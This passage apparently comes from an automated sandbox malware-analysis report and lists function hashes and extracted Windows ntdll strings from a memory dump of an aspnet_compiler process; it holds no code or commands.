                                                              • Opcode ID: 885a73430e193eea22b6dbee7aace336bbdf92d840ba2d7b909d449523e6cc25
                                                              • Instruction ID: 159650bfb4acb2a70506cd8cc7bdb36f1f458241f623d0acad5cf34ac82e0b0f
                                                              • Opcode Fuzzy Hash: 885a73430e193eea22b6dbee7aace336bbdf92d840ba2d7b909d449523e6cc25
                                                              • Instruction Fuzzy Hash: 1CD0C2334C10207ACB27E6197D04F932A5A9B54270F064860F20892028D524DC8182C4
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction ID: 43a02c3925834a6d9322a7f1e69c507fd11908b477efa20ed6615466ba1f0924
                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction Fuzzy Hash: 84E0C231500A21EFDB322F2DDD00F5176A5FFA4BA0F118C2AF28A060A98774AC81CB54
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a2a4d4304bf8a801e52cb7bc7498068f52f0a6678ff85c474d718bd2b283e769
                                                              • Instruction ID: 20f5a13c45f3fa31fb636e07e4bec8a3472d66bd6a8995d2e58e0331bf397e8f
                                                              • Opcode Fuzzy Hash: a2a4d4304bf8a801e52cb7bc7498068f52f0a6678ff85c474d718bd2b283e769
                                                              • Instruction Fuzzy Hash: 7FE08C321008506BC612FB5DDD10F5A739EEBE4660F010225B15997290CA24AD01C794
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction ID: be67f9841248b9acbfc4c670c9624b123cf69aea94b5ef6a50cd43c275bb97f2
                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction Fuzzy Hash: ADE08633111A1487C728DE18D511B7277A4EF45720F09463EA61347784C634E544C794
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                              • Instruction ID: 4ca5ddd40b197e3b199277bea468899214c2342da6b046ad94697ad8ae634303
                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                              • Instruction Fuzzy Hash: 35D05E36911A50AFC7329F1BEA00D13BBF9FBC4A20706062EA54983920C670A906CBA0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction ID: 932eccdc5288382cce3ebed465c9f270a155ed053a03504b4e8b64633d22f594
                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction Fuzzy Hash: 71D0A932618620ABDB72AA1CFC00FC333E8BB88760F060459B408CB050C374AC81CA84
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction ID: 65cc4c57b8c04007058680cadc2357433705d64f5bb3b13ae37109ab7f17f1a4
                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction Fuzzy Hash: 98E0EC35954685EBDF52DF59D644F5AFBF5BB98B40F150058A5089B660C634AA00CB40
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction ID: 274e00a176e57f7ce7dcb8f5ad402f165a52e120e3bdfa707cd23655ec40a2bd
                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction Fuzzy Hash: F0D02233226031A3CF285665A910F636909ABC1AA0F0A002C390E93800C0088C42C2E0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction ID: 05be870cb5e32f696f8ec25ac094aea1c975b30124cbdec7e91c13d2189d928a
                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction Fuzzy Hash: 91D012371E054DBBCB119F66DC01F957BA9E7A4BA0F454020BA08875A0C63AE950D684
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1ef05556d55b0c46c102690462b3b36b7508f44bfa850b39fde3cb41de8a782
                                                              • Instruction ID: 95b5fbec26819acc1ca7c52563f25b37374b0f9b24d5a580e21bf3d34866a48d
                                                              • Opcode Fuzzy Hash: e1ef05556d55b0c46c102690462b3b36b7508f44bfa850b39fde3cb41de8a782
                                                              • Instruction Fuzzy Hash: BDD0A935A9A402DBDF2BCF0ACA20E2E3AB1FB10650F40006CEF4192029E33CEC02CB00
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction ID: 037c3993eebbc109b67f8bf1271465462cda4967fcfb73a0eddce428dd27d841
                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction Fuzzy Hash: 78D0C939252E80DFD61BCB0CC5A4B5533BCFB84B45F890494F505CBB22D62CD940CA10
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction ID: a9e76a5cffe344fdbb51f8f2f1a967ad056016078688745fd7bc0d89d83a2fbf
                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction Fuzzy Hash: 91C01232150644AFC7119A95CD01F0177A9E798B50F010021F70447570C535E910D644
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction ID: 7b969853ad8b96e90574ba4f246467873afef3bff2ad4f49959323f854f8df74
                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction Fuzzy Hash: C2D01236100248EFCB02DF41D990E9A772AFBD8750F109019FD1907650CA31ED62DA50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction ID: 023ad89f624ce2649e50a46aab610098457c8532539a8d482a36d93117f0645f
                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction Fuzzy Hash: DEC04879701A428FCF16DB2AE294F5977E4FB84740F150890E909CBB22E628E901CA10
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                              • Instruction ID: b01379f97eb1e198e529a0c3e7743bcde59fd077cdd01e0f27de323f73e56fa2
                                                              • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                              • Instruction Fuzzy Hash: 61B01232212645CFC7036760CB08B1832A9BF157C0F0900F0650089870D6288910E501
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 06df720567649793fb839410f39740a2e8af79caa1113fce1945fb1be6e09961
                                                              • Instruction ID: 6f37d030d8e2e86f7f758ff262802249e17fd2890f0ea6cef890d1614890ada8
                                                              • Opcode Fuzzy Hash: 06df720567649793fb839410f39740a2e8af79caa1113fce1945fb1be6e09961
                                                              • Instruction Fuzzy Hash: 66900231A05800129140715848846464015A7E0301F56C111F0428554CCA188A576361
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f30d74b795e6d493bcce477de5aafa26592ce1b35de68910a47b3d471b55a366
                                                              • Instruction ID: 6cd5ddd1ce4ff3a4f4ffe860e3a9138ea4cb00e8f5badd6f3b11505ea65fe198
                                                              • Opcode Fuzzy Hash: f30d74b795e6d493bcce477de5aafa26592ce1b35de68910a47b3d471b55a366
                                                              • Instruction Fuzzy Hash: BA90026160180403D14075584804707001597D0302F56C111B2068555ECA2D8D527235
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c84ee6b7c5a7d092b70c52ef74d437c6efe75d7cad9bec6930f32fc6cdf0453e
                                                              • Instruction ID: 55feef0a563d0788c4d7d8bea80b39857f483b2ad65aeeb25160721b3b375058
                                                              • Opcode Fuzzy Hash: c84ee6b7c5a7d092b70c52ef74d437c6efe75d7cad9bec6930f32fc6cdf0453e
                                                              • Instruction Fuzzy Hash: 7F90022170140402D102715844147060019D7D1345F96C112F1428555DC6298A53B232
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fa6d6e79b48b41d83dce1a690570a2bc2c7b337b33d2d3806f32a54928698eb
                                                              • Instruction ID: 42f25f605c0ec525f0c27f318f0bc2bbec2cf5e4ef1fd24cf56a812aa1d14a1e
                                                              • Opcode Fuzzy Hash: 7fa6d6e79b48b41d83dce1a690570a2bc2c7b337b33d2d3806f32a54928698eb
                                                              • Instruction Fuzzy Hash: CB90022164140802D140715884147070016D7D0601F56C111B0028554DC61A8A6677B1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75eb8bc9e5a3b28b142620fda9e1c0349ed38885526728b3658970ba3541c7c3
                                                              • Instruction ID: bf854dd4e84bba4782b3b0be693dcee68dbecb4b4809a5ab006bda9f0f6fe7e2
                                                              • Opcode Fuzzy Hash: 75eb8bc9e5a3b28b142620fda9e1c0349ed38885526728b3658970ba3541c7c3
                                                              • Instruction Fuzzy Hash: E190022160184442D14072584804B0F411597E1202F96C119B415A554CC91989566721
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5088f660858c41020f7d50db696411fef86b0ad6c1eb6e566614aa75252be521
                                                              • Instruction ID: 0a0e1627cbfee19cf9dcf01a9701234b581cc104f1e7198f0e74ed25fdeed4d2
                                                              • Opcode Fuzzy Hash: 5088f660858c41020f7d50db696411fef86b0ad6c1eb6e566614aa75252be521
                                                              • Instruction Fuzzy Hash: AF90022164545102D150715C44047164015B7E0201F56C121B0818594DC55989567321
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d4164ac56ce086e2b37a0fe42d1cf7a4f676eacd6fee2bd71227516accf04115
                                                              • Instruction ID: 0d73552fdfa5e124fdd9727daa92542d771c2e399ecde5c52c497a64c280e7dc
                                                              • Opcode Fuzzy Hash: d4164ac56ce086e2b37a0fe42d1cf7a4f676eacd6fee2bd71227516accf04115
                                                              • Instruction Fuzzy Hash: 8A90023160240142954072585804B4E411597E1302F96D515B0019554CC91889626321
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: accaad74b4a9a778f09399df836490058cd5c8243973b20652666eb2e136912a
                                                              • Instruction ID: 73d322924501b4c4b8a23ec34689397536c7a860687e846af3e34059f98ac3b5
                                                              • Opcode Fuzzy Hash: accaad74b4a9a778f09399df836490058cd5c8243973b20652666eb2e136912a
                                                              • Instruction Fuzzy Hash: D890023560140402D51071585804746005697D0301F56D511B0428558DC65889A2B221
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: c1b24cbec5792fd382b899b0fad3b6d31dc7ce697c07307ba33e4d4d09c12b9c
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A54725
                                                              • ExecuteOptions, xrefs: 01A546A0
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A54787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A546FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A54655
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A54742
                                                              • Execute=1, xrefs: 01A54713
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A502E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A502BD
                                                              • RTL: Re-Waiting, xrefs: 01A5031E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A57B7F
                                                              • RTL: Resource at %p, xrefs: 01A57B8E
                                                              • RTL: Re-Waiting, xrefs: 01A57BAC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A5728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A57294
                                                              • RTL: Resource at %p, xrefs: 01A572A3
                                                              • RTL: Re-Waiting, xrefs: 01A572C1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280